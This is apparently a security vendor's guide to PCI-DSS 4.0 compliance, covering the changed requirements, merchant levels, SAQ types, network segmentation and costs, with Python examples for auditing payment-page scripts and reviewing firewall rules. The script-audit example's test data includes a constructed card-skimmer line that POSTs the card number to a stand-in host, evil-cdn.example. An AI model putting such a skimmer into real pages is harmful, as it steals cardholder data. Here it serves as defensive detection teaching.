PCI-DSS 4.0 Compliance for Payment-Handling Organizations
PCI-DSS 4.0 became the only assessable version of the standard on March 31, 2024, when version 3.2.1 was retired, and it changes how organizations must approach cardholder data protection: stronger authentication, tighter encryption requirements, more rigorous vulnerability management, and monitoring that is continuous rather than periodic. A clean assessment against version 3.2.1 says little about your position against the requirements that 4.0 added or changed, particularly the future-dated ones that became mandatory on March 31, 2025. Armorstack’s SENTRY monitoring, CORE infrastructure management, and VERITY advisory operationalize PCI-DSS 4.0 compliance across your cardholder data environment.
PCI-DSS 4.0: What Changed and Why It Matters
The Payment Card Industry Data Security Standard is maintained by the PCI Security Standards Council, a body established in 2006 by American Express, Discover, JCB, Mastercard, and Visa. It applies to any organization that stores, processes, or transmits cardholder data. Version 4.0 was published on March 31, 2022, ran alongside version 3.2.1 during a two-year transition, and became the mandatory standard on March 31, 2024, when version 3.2.1 was retired. Most of the new requirements were future-dated: they counted as best practice until March 31, 2025 and are mandatory thereafter. A limited revision, v4.0.1 (June 2024), supersedes v4.0 for assessments from 2025; it clarifies wording and guidance without adding or removing requirements, so the material below applies to it as well.
The core structure remains 12 requirements organized around six control objectives, but PCI-DSS 4.0 made substantive changes across multiple requirements. Detailed analysis of the requirement-by-requirement changes is at PCI-DSS 4.0 changes. The most operationally significant shifts include:
- Authentication requirements strengthened (Requirement 8) — Multi-factor authentication is now required for all access into the cardholder data environment (CDE) (8.4.2), not just for remote access from outside the network and for administrative access, and the MFA system itself must resist replay and must not be bypassable (8.5.1). Password minimum length increased from 7 to 12 characters (8.3.6; 8 where a system cannot support 12), and the account lockout threshold moved from 6 to 10 invalid attempts with a lockout of at least 30 minutes (8.3.4). The requirement to remove or disable inactive accounts within 90 days (8.2.6) is unchanged.
- Phishing addressed (Requirement 5) — Requirement 5.4.1 requires automated mechanisms (mail filtering, link and attachment scanning, and anti-spoofing controls such as SPF, DKIM and DMARC) to detect and protect personnel against phishing attacks. This is a technical control, distinct from the phishing awareness training in 12.6.3.1. Phishing-resistant MFA for CDE access complements it, since a credential that cannot be phished removes what most phishing campaigns are after.
- Targeted risk analysis introduced (12.3.1) — Where a requirement leaves the frequency of an activity to the entity (for example, how often to run certain malware scans, review lower-risk logs, or re-check payment page integrity), PCI-DSS 4.0 lets a documented targeted risk analysis justify the chosen frequency instead of a fixed calendar schedule. The analysis must be reviewed at least every 12 months. It is not the same thing as the customized approach (12.3.2), which lets an entity meet a requirement’s stated objective with a different control; that route requires a QSA assessment with assessor-defined testing and is not available through an SAQ. Both trade prescription for flexibility and both demand a defensible, written methodology.
- E-commerce and payment page security expanded (Requirements 6 and 11) — Organizations that run or embed payment pages must maintain an inventory of every script loaded and executed in the consumer’s browser, with a written justification for each, and must authorize those scripts and verify their integrity (6.4.3). A change- and tamper-detection mechanism must alert on unauthorized modification of the HTTP headers and content of the payment page as received by the browser (11.6.1), evaluated at least once every seven days or at a frequency set by a targeted risk analysis. Together these address web skimming (Magecart-style attacks), in which an attacker injects or modifies client-side JavaScript to capture card data before it reaches the processor. Under v4.0, SAQ A includes both requirements for e-commerce merchants, so fully outsourcing the payment form does not by itself remove them; v4.0.1 drops them from SAQ A but adds an eligibility criterion that the merchant’s site is not susceptible to script-based attacks on the payment flow, which in practice means demonstrating the same controls.
- Continuous monitoring elevated (Requirements 10 and 11) — Requirement 10.4.1.1 requires automated mechanisms for audit log review, so manual daily review no longer satisfies the standard at scale; 10.7.2 requires prompt detection of, and response to, failures of critical security controls for all entities rather than only service providers; 11.3.1.2 requires internal vulnerability scans to be authenticated; and 11.5.1.1 adds detection of covert malware communication channels for service providers. The net effect is that log review, vulnerability scanning, and intrusion detection must be continuous or near-continuous for in-scope systems rather than periodic events.
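The script inventory and tamper-detection mechanics behind Requirements 6.4.3 and 11.6.1 are easier to see in code than in prose. The following is an added example, not Armorstack tooling or code from the standard: it parses a payment page, checks every script against an authorized inventory of Subresource Integrity hashes, and compares what the CDN actually serves against the authorized content. The page, script bodies, URLs (`shop.example`, `cdn.example`, `evil-cdn.example`) and inventory are all constructed, and the `fetched` dictionary stands in for what a browser would download for each script URL.

```python
"""Payment-page script audit, in the spirit of PCI DSS 4.0 Requirements 6.4.3 and 11.6.1.

Added example, not Armorstack tooling. The page, script contents, URLs and the
authorized inventory are all constructed; `fetched` stands in for what the
browser would actually download for each script URL.
"""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (sha384, base64) the browser would compute."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


class _ScriptCollector(HTMLParser):
    """Collects every <script> on the page: src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_payment_page(html, inventory, fetched):
    """Return (severity, message) findings for scripts that are not in the
    authorized inventory (6.4.3) or whose served content no longer matches the
    authorized hash (11.6.1 tamper detection)."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings, seen = [], set()
    for s in parser.scripts:
        if s["src"] is None:
            h = sri_hash(s["body"].strip().encode())
            if h not in inventory["inline"]:
                findings.append(("high", f"unauthorized inline script ({h})"))
            continue
        src = s["src"]
        seen.add(src)
        if src not in inventory["external"]:
            findings.append(("high", f"unauthorized script {src}"))
            continue
        expected = inventory["external"][src]
        if s["integrity"] != expected:
            findings.append(("medium", f"{src}: integrity attribute missing or stale"))
        if sri_hash(fetched.get(src, b"")) != expected:
            findings.append(("high", f"{src}: served content differs from authorized hash"))
    for src in inventory["external"]:
        if src not in seen:
            findings.append(("info", f"inventoried script {src} no longer on page"))
    return findings


# Constructed baseline: what was reviewed and authorized.
AUTHORIZED = {
    "https://shop.example/static/checkout.js": b"document.forms.pay.onsubmit = validate;",
    "https://cdn.example/lib/forms.js": b"function validate(e){return e.target.checkValidity();}",
}
INLINE_OK = b"window.dataLayer = window.dataLayer || [];"
INVENTORY = {
    "external": {src: sri_hash(body) for src, body in AUTHORIZED.items()},
    "inline": {sri_hash(INLINE_OK)},
}

# Constructed current state: forms.js on the CDN has been modified (a skimmer
# appended) and an unknown third-party script has appeared on the page.
FETCHED = dict(AUTHORIZED)
FETCHED["https://cdn.example/lib/forms.js"] += (
    b"fetch('https://evil-cdn.example/c',{method:'POST',body:document.forms.pay.cardnumber.value});"
)

SAMPLE_PAGE = (
    '<html><head>'
    '<script src="https://shop.example/static/checkout.js" integrity="{0}" crossorigin="anonymous"></script>'
    '<script src="https://cdn.example/lib/forms.js" integrity="{1}" crossorigin="anonymous"></script>'
    '<script src="https://evil-cdn.example/s.js"></script>'
    '<script>window.dataLayer = window.dataLayer || [];</script>'
    '</head><body><form name="pay"></form></body></html>'
).format(INVENTORY["external"]["https://shop.example/static/checkout.js"],
         INVENTORY["external"]["https://cdn.example/lib/forms.js"])

if __name__ == "__main__":
    for severity, message in audit_payment_page(SAMPLE_PAGE, INVENTORY, FETCHED):
        print(f"[{severity}] {message}")
```

Two design points matter in practice. The `integrity` attribute on the page only protects against a modified CDN file if the page itself is intact, so the audit hashes the served content independently rather than trusting the attribute; and the inventory entry, not the page, is the source of truth for which hashes are authorized, which is what an assessor will ask to see for 6.4.3. A production mechanism would fetch the live page and scripts on a schedule justified by the targeted risk analysis, and would also alert on changed HTTP headers such as Content-Security-Policy, which this example does not inspect.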
The 12 PCI-DSS Requirements
| Requirement | Title | Common Gap |
|---|---|---|
| 1 | Install and maintain network security controls | No documented network diagrams showing CDE boundary |
| 2 | Apply secure configurations to all system components | Vendor default credentials unchanged on network devices |
| 3 | Protect stored account data | Primary account numbers (PAN) stored unencrypted or without tokenization/truncation; sensitive authentication data retained after authorization |
| 4 | Protect cardholder data in transit | Legacy systems using TLS 1.0 or 1.1 for PAN transmission |
| 5 | Protect all systems against malware | EDR agents absent from servers in the CDE |
| 6 | Develop and maintain secure systems and software | No web application firewall or script management for payment pages |
| 7 | Restrict access to system components and cardholder data | Access provisioned by request without role-based authorization documentation |
| 8 | Identify users and authenticate access | MFA not enforced for all CDE access; passwords below 12-character minimum |
| 9 | Restrict physical access to cardholder data | No physical access log for server rooms; no badge system for CDE areas |
| 10 | Log and monitor all access to system components and cardholder data | Logs not centralized or not retained for 12 months (3 months immediately available) |
| 11 | Test security of systems and networks regularly | No quarterly external vulnerability scan by an ASV; internal scans unauthenticated or not quarterly; no annual penetration test |
| 12 | Support information security with organizational policies and programs | Security policy not updated in current year; no annual risk assessment |
Merchant Levels and Validation Requirements
PCI-DSS validation requirements — including whether a Qualified Security Assessor (QSA) on-site assessment is required or whether a Self-Assessment Questionnaire suffices — are determined by merchant level, which is defined by annual card transaction volume and by individual card brand rules.
| Merchant Level | Annual Visa/Mastercard Transactions | Validation Requirement |
|---|---|---|
| Level 1 | More than 6 million | Annual on-site QSA assessment producing a Report on Compliance (ROC) and Attestation of Compliance (AOC); quarterly ASV scans |
| Level 2 | 1 million to 6 million | Annual SAQ (Mastercard requires it be completed by a QSA or an internally trained ISA) or on-site assessment; quarterly ASV scans |
| Level 3 | 20,000 to 1 million (e-commerce) | Annual SAQ; quarterly ASV scans |
| Level 4 | Fewer than 20,000 (e-commerce) or up to 1 million (other) | Annual SAQ; quarterly ASV scans where in-scope systems are internet-facing, with the acquirer setting the requirement |
Note that card brands set their own merchant level definitions and may escalate a merchant’s level following a data compromise regardless of transaction volume. Acquirers (the banks that process merchants’ card transactions) have authority to enforce stricter validation requirements than the card brand minimums. Full detail on merchant level determination and its implications is at PCI-DSS merchant levels.
Self-Assessment Questionnaire Types: Selecting the Right SAQ
Organizations not required to complete a full QSA assessment may validate compliance through a Self-Assessment Questionnaire. PCI-DSS 4.0 maintains multiple SAQ variants, each applicable to a specific payment acceptance model. Selecting the wrong SAQ — or defaulting to a simpler SAQ when a more comprehensive one applies — creates compliance risk and can result in liability exposure following a breach.
| SAQ Type | Applicable To | Approximate Question Count | Key Characteristic |
|---|---|---|---|
| SAQ A | Card-not-present merchants; all cardholder data functions fully outsourced | ~22 questions | No electronic cardholder data on merchant systems or premises |
| SAQ A-EP | E-commerce merchants whose website does not itself receive cardholder data but controls how it reaches a third-party processor (e.g., a merchant-hosted form that posts directly to the processor, or merchant-served JavaScript on the payment page) | ~191 questions | Merchant’s website affects security of payment transaction |
| SAQ B | Merchants using imprint machines or standalone dial-out terminals only | ~41 questions | No electronic cardholder data storage; no internet connectivity for terminals |
| SAQ B-IP | Merchants using standalone IP-connected payment terminals | ~83 questions | Terminals do not store cardholder data; IP-connected but isolated |
| SAQ C | Merchants with payment application systems connected to the internet | ~161 questions | No electronic cardholder data storage beyond transaction authorization |
| SAQ C-VT | Merchants using web-based virtual terminals only | ~65 questions | Single transactions entered manually; no electronic storage |
| SAQ D (Merchant) | Merchants not eligible for any other SAQ type | ~329 questions | Full assessment scope including storage, processing, and transmission |
| SAQ D (Service Provider) | Service providers not eligible for another SAQ type | ~331 questions | Full scope; often equivalent to QSA assessment in effort required |
A common and consequential error is for e-commerce merchants to file SAQ A when SAQ A-EP or SAQ D applies because their website code affects the payment flow. A separate SAQ P2PE exists for merchants that accept cards only through a PCI-listed point-to-point encryption solution and store no cardholder data electronically. Full guidance on SAQ eligibility criteria is at PCI-DSS SAQ types.
Network Segmentation: The Single Highest-ROI PCI Control
PCI-DSS compliance scope is defined by the cardholder data environment: the people, processes, and system components that store, process, or transmit cardholder data or sensitive authentication data, plus any system component that is connected to the CDE or could affect its security (domain controllers, jump hosts, log collectors, patch and configuration servers are the usual surprises). Without network segmentation, a flat network puts the entire network in scope, dramatically increasing both compliance cost and breach risk.
Proper network segmentation isolates CDE systems from out-of-scope systems using firewalls, VLANs with enforced ACLs, or software-defined perimeters, with documented rulesets and a network diagram that shows the CDE boundary (1.2.4). When implemented correctly, segmentation substantially reduces the number of system components subject to PCI-DSS controls, which reduces the cost of both remediation and ongoing validation. Segmentation does not reduce scope by itself: scope must be confirmed and documented at least every 12 months (12.5.2), and any undocumented path into the CDE pulls its source back in.
PCI-DSS 4.0 requires organizations that rely on segmentation to test it by penetration testing at least every 12 months and after any change to segmentation controls or methods (11.4.5); service providers must test at least every six months (11.4.6). The testing must cover every segmentation method in use and confirm that they isolate the CDE from all out-of-scope systems, not only the ones assumed to be far from it. SENTRY managed detection and response provides continuous monitoring of network traffic to detect segmentation failures in real time. CORE managed IT services designs and maintains the network architecture, VLAN configuration, and firewall rulesets that define the CDE boundary. Segmentation architecture guidance and testing requirements are detailed at PCI-DSS network segmentation.
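Before the 11.4.5 penetration test, a desk review of the firewall rules catches the most common segmentation failure: a broad allow rule that quietly scopes an entire out-of-scope segment into the CDE. The following is an added example, not Armorstack tooling, that models first-match firewall evaluation and walks every sampled out-of-scope host against every CDE host and service, reporting any allowed path that is not a documented exception. The segments (`10.10.0.0/24` as the CDE, a corporate LAN, guest Wi-Fi, an admin jump host), the services and the rules are constructed; a real review would export the live ruleset.

```python
"""Firewall-rule review ahead of PCI DSS segmentation testing (Requirement 11.4.5).

Added example, not Armorstack tooling. The segments, hosts, services and rules
are constructed; a real review would export the firewall's actual ruleset.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    action: str    # "allow" or "deny"
    src: str       # source CIDR
    dst: str       # destination CIDR
    proto: str     # "tcp", "udp" or "any"
    ports: tuple   # inclusive (low, high) destination port range

    def matches(self, src_ip, dst_ip, proto, dport):
        return (src_ip in ipaddress.ip_network(self.src)
                and dst_ip in ipaddress.ip_network(self.dst)
                and self.proto in ("any", proto)
                and self.ports[0] <= dport <= self.ports[1])


def evaluate(rules, src, dst, proto, dport):
    """First-match evaluation with an implicit final deny, as most firewalls do."""
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in rules:
        if rule.matches(src_ip, dst_ip, proto, dport):
            return rule.action
    return "deny"


def sample_hosts(cidr):
    """A few representative addresses per segment: first, middle and last usable."""
    net = ipaddress.ip_network(cidr)
    if net.num_addresses <= 2:
        return [str(net.network_address)]
    return [str(net[1]), str(net[net.num_addresses // 2]), str(net[-2])]


def is_documented(documented, src, dst, proto, dport):
    """True if (src, dst, proto, port) falls inside a justified, written exception."""
    return any(ipaddress.ip_address(src) in ipaddress.ip_network(s)
               and ipaddress.ip_address(dst) in ipaddress.ip_network(d)
               and p == proto and port == dport
               for s, d, p, port in documented)


def segmentation_findings(rules, out_of_scope, cde_hosts, services, documented):
    """Every allowed path from an out-of-scope segment into the CDE that is not a
    documented exception. Each one either needs a rule change or pulls the source
    (and whatever it talks to) into PCI scope as a connected-to system."""
    findings = []
    for segment in out_of_scope:
        for src in sample_hosts(segment):
            for dst in cde_hosts:
                for proto, port in services:
                    if (evaluate(rules, src, dst, proto, port) == "allow"
                            and not is_documented(documented, src, dst, proto, port)):
                        findings.append((segment, src, dst, proto, port))
    return findings


# Constructed environment.
CDE = "10.10.0.0/24"
CDE_HOSTS = ["10.10.0.5", "10.10.0.20"]                           # payment web tier, card database
OUT_OF_SCOPE = ["10.20.0.0/16", "10.30.0.0/16", "10.20.5.10/32"]  # corporate LAN, guest Wi-Fi, admin jump host
SERVICES = [("tcp", 22), ("tcp", 443), ("tcp", 3306), ("tcp", 3389)]

RULES = [
    Rule("allow", "10.20.5.10/32", CDE, "tcp", (22, 22)),              # jump host SSH, documented
    Rule("deny", "10.30.0.0/16", CDE, "any", (0, 65535)),              # guest Wi-Fi blocked outright
    Rule("allow", "10.20.0.0/16", "10.10.0.5/32", "tcp", (443, 443)),  # whole corporate LAN to web tier: undocumented
    Rule("deny", "0.0.0.0/0", CDE, "any", (0, 65535)),                 # explicit final deny into the CDE
]
DOCUMENTED = [("10.20.5.10/32", CDE, "tcp", 22)]

if __name__ == "__main__":
    for segment, src, dst, proto, port in segmentation_findings(RULES, OUT_OF_SCOPE, CDE_HOSTS, SERVICES, DOCUMENTED):
        print(f"{segment}: {src} -> {dst} {proto}/{port} allowed but undocumented")
```

On the constructed ruleset the review flags the corporate-wide HTTPS rule from every sampled corporate host, including the jump host, whose only documented exception is SSH. That is exactly the kind of rule that makes an assessor declare the corporate LAN in scope. The review is a complement to, not a substitute for, the 11.4.5 test: the penetration tester still has to send traffic from live hosts on each out-of-scope segment, in both directions, and exercise non-firewall segmentation (VLAN ACLs, SDN policy, host firewalls) that a rule export does not capture.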
PCI-DSS Compliance Cost: What Organizations Should Expect
PCI-DSS compliance cost varies significantly based on merchant level, current control posture, network architecture, and whether significant remediation work is required. The following are general market ranges based on organization type — not Armorstack pricing. Contact Armorstack directly for a scoped engagement estimate.
| Expense Category | Typical Market Range | Notes |
|---|---|---|
| Gap assessment and remediation consulting | $15,000 – $60,000 | Varies by current posture and CDE scope size |
| QSA on-site assessment (Level 1) | $50,000 – $200,000+ | Depends on environment complexity and QSA firm |
| ASV quarterly scans | $1,000 – $5,000 per quarter | Required wherever in-scope components are internet-facing (11.3.2); applies under most SAQ types and every QSA assessment |
| Annual penetration test (CDE scope) | $15,000 – $40,000 | Includes segmentation validation for segmented environments |
| Ongoing compliance program management | $2,500 – $8,000 per month | Monitoring, log management, policy maintenance, evidence collection |
A detailed breakdown of cost factors by merchant level and organization profile is at PCI-DSS compliance cost.
Armorstack’s PCI-DSS 4.0 Compliance Program
Armorstack approaches PCI-DSS compliance as an operational program rather than an annual assessment event. VERITY advisory establishes the governance layer: scoping and CDE definition, risk assessment, policy framework, and evidence management. SENTRY managed detection and response operationalizes Requirements 10 and 11 — centralized log collection and retention across CDE systems, continuous monitoring with documented alert review, and quarterly vulnerability scan management. CORE managed IT services maintains the infrastructure controls that touch Requirements 1 through 8: firewall configuration management, patch management, endpoint protection, MFA enforcement, access control, and encryption at rest and in transit.
For organizations pursuing the 90-Day Proof, the PCI-DSS track focuses the first 30 days on scoping and gap identification, the next 30 on high-priority control implementation, and the final 30 on evidence collection infrastructure and pre-assessment readiness. To discuss your cardholder data environment and where your current PCI-DSS gaps are, talk to an Armorstack compliance expert.